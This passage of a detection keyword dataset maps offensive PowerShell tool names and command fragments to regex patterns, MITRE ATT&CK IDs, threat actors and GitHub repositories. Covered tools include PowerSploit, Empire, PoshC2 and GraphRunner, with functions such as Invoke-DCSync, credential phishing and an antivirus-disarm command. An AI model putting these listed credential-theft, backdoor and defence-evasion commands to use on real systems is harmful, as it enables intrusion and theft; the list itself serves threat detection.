PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48924" "*Invoke-CredentialInjection.ps1*",".{0,1000}Invoke\-CredentialInjection\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48925" "*Invoke-CredentialInjection.ps1*",".{0,1000}Invoke\-CredentialInjection\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48926" "*Invoke-CredentialPhisher*",".{0,1000}Invoke\-CredentialPhisher.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - 
BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48927" "*Invoke-CredentialPhisher*",".{0,1000}Invoke\-CredentialPhisher.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48928" 
"*Invoke-CredentialPhisher.ps1*",".{0,1000}Invoke\-CredentialPhisher\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48929" "*Invoke-CredentialsPhish*",".{0,1000}Invoke\-CredentialsPhish.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48930" "*Invoke-CylanceDisarm -ProcessID * -DisableMemDef*",".{0,1000}Invoke\-CylanceDisarm\s\-ProcessID\s.{0,1000}\s\-DisableMemDef.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","48931" "*Invoke-DAFT.*",".{0,1000}Invoke\-DAFT\..{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48932" "*invoke-daisychain*",".{0,1000}invoke\-daisychain.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48933" "*Invoke-DatatExfiltration*",".{0,1000}Invoke\-DatatExfiltration.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","48934" "*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - 
BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48935" "*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","1","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","48936" "*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","48937" "*Invoke-DCOMObjectScan.json*",".{0,1000}Invoke\-DCOMObjectScan\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","48938" "*invoke-dcompayload*",".{0,1000}invoke\-dcompayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - 
T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48939" "*Invoke-DCOMPowerPointPivot*",".{0,1000}Invoke\-DCOMPowerPointPivot.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","48940" "*Invoke-DCSync *",".{0,1000}Invoke\-DCSync\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 
- TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48941" "*Invoke-DCSync*",".{0,1000}Invoke\-DCSync.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","48942" "*Invoke-DCSync*",".{0,1000}Invoke\-DCSync.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48943" "*Invoke-DCSync.ps1*",".{0,1000}Invoke\-DCSync\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","48944" "*Invoke-DeadUserBackdoor*",".{0,1000}Invoke\-DeadUserBackdoor.{0,1000}","offensive_tool_keyword","empire","Empire is a 
post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48945" "*Invoke-DeadUserBackdoor*",".{0,1000}Invoke\-DeadUserBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","48946" 
"*Invoke-DefenderExclusionsCheck*",".{0,1000}Invoke\-DefenderExclusionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48947" "*Invoke-DeleteGroup -Tokens * -groupID *",".{0,1000}Invoke\-DeleteGroup\s\-Tokens\s.{0,1000}\s\-groupID\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48948" "*Invoke-DeleteOAuthApp -Tokens *",".{0,1000}Invoke\-DeleteOAuthApp\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48949" "*Invoke-DeleteOAuthApp*",".{0,1000}Invoke\-DeleteOAuthApp.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Delete an OAuth App","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48950" "*Invoke-DHCPCheckup*",".{0,1000}Invoke\-DHCPCheckup.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against 
Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","48951" "*Invoke-DinvokeKatz*",".{0,1000}Invoke\-DinvokeKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48952" "*Invoke-DisableMachineAcctChange*",".{0,1000}Invoke\-DisableMachineAcctChange.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48953" "*Invoke-DllEncode*",".{0,1000}Invoke\-DllEncode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48954" "*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","48955" 
